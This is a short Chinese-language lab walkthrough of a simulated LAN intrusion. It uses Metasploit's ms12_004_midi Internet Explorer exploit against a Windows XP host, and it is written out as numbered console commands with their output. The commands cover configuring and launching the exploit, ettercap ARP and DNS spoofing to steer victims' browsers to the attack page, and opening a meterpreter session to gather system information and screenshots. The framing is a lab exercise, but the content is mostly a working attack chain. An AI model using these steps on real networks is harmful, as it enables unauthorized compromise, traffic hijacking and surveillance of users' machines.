MS12_004局域网入侵模拟实验

环境：

     攻击主机bt5    IP 192.168.29.134

     目标主机xpsp3  IP 192.168.29.135

     网关            IP 192.168.29.254

1.   use exploit/windows/browser/ms12_004_midi

2.   show targets

   Exploit targets:

   Id  Name

   --  ----

   0   Automatic

   1   IE 6 on Windows XP SP3

   2   IE 7 on Windows XP SP3

   3   IE 8 on Windows XP SP3 with JRE ROP

   4   IE 8 on Windows XP SP3 with msvcrt

3.   info

    

4.  show options

    Module options (exploit/windows/browser/ms12_004_midi):

   Name        Current Setting  Required  Description

   ----        ---------------  --------  -----------

   OBFUSCATE   false            no        Enable JavaScript obfuscation

   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

   SRVPORT     8080             yes       The local port to listen on.

 

5.  set SRVHOST 192.168.29.134

6.  set SRVPORT 80

7   set URIPATH /   

8.  exploit -j

9.  局域网DNS欺骗

  ettercap -T -Q -i eth0 -M arp -P dns_spoof // //

xp上用ie打开浏览器访问网页后

10. session -i

   session -i 1

11 进入meterpreter 后

   meterpreter > sysinfo

   Computer        : FRANK-34C8YW2BE

   OS              : Windows XP (Build 2600, Service Pack 1).

   Architecture    : x86

   System Language : en_US

   Meterpreter     : x86/win32

12.  ？   查看使用命令

13  screenshot   截取远程桌面